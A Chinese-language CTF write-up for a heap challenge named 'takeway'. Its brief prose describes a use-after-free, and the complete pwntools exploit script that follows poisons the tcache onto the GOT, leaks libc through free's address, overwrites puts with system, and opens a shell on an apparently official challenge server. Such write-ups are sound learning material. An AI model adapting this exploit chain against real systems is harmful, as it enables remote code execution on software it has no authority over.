delete后指针没有置空,存在UAF漏洞
先把限制chunk构建次数的5改大,然后泄露free_got来泄露libc地址,最后改puts的got表改为system
直接把chunk malloc到got表会直接EOF,所以选择malloc到got区域上面的2个数字为0的区域(超级麻烦,求求更加简便的做法)
* exp:
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
# p = process(["/mnt/d/desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/ld-2.31.so", "./takeway"],
# env={"LD_PRELOAD":"/mnt/d/desktop/glibc-all-in-one/libs/2.31-0ubuntu9_amd64/libc-2.31.so"})
# p = process(["/mnt/d/desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/ld-2.27.so", "./takeway"],
# env={"LD_PRELOAD":"/mnt/d/desktop/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6"})
# gdb.attach(p)
p=remote('101.200.234.115', 43104)
# p=process('./takeway')
context(arch='arm64', os='linux', log_level='debug')
elf=ELF('./takeway')
# libc=ELF('/mnt/d/desktop/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6')
def add(index,name,content):
p.recvuntil('Please input your choose: ')
p.sendline(b'1')
p.sendline(str(index))
p.recvuntil('Please input your food name: ')
p.sendline(name)
p.recvuntil('remark: ')
p.send(content)
def rename(index,new_name):
p.recvuntil('Please input your choose: ')
p.sendline(b'3')
p.recvuntil('Please input index: ')
p.sendline(str(index))
p.recvuntil('New food name is: ')
p.sendline(new_name)
def delete(index):
p.recvuntil('Please input your choose: ')
p.sendline(b'2')
p.recvuntil('Please input your order index: ')
p.sendline(str(index))
add(0,b'aaaa',b'/bin/sh\x00')
add(1,b'bbbb',b'/bin/sh\x00')
delete(0)
delete(1)
rename(1,p64(0x404088-0x8))
add(2,b'aaaa',b'aaaa')
add(3,b'6666',b'60')
add(4,b'bbbb',b'/bin/sh\x00')
add(100,b'bbbb',b'/bin/sh\x00')
delete(4)
delete(100)
rename(100,p64(0x404008))
add(101,b'bbbb',b'/bin/sh\x00')
add(102,b'aaaa',b'aaaaaaaa')
p.recvuntil('Please input your choose: ')
p.sendline(b'3')
p.recvuntil('Please input index: ')
p.sendline(str(102))
p.recvuntil('order is: ')
p.recvuntil('aaaaaaaa')
free_addr=u64(p.recv(6).ljust(8,b'\x00'))
print("free_addr =",hex(free_addr))
p.recvuntil('New food name is: ')
p.sendline(b'1')
libc = LibcSearcher('free',free_addr)
libc_base=free_addr-libc.dump('free')
system=libc_base+libc.dump('system')
add(103,b'bbbb',b'/bin/sh\x00')
add(104,b'bbbb',b'/bin/sh\x00')
delete(103)
delete(104)
rename(104,p64(0x404010))
add(105,b'bbbb',b'/bin/sh\x00')
add(106,b'aaaa',p64(free_addr)+p64(system))
p.recvuntil('Please input your choose: ')
p.sendline(b'3')
p.recvuntil('Please input index: ')
p.sendline(str(106))
p.interactive()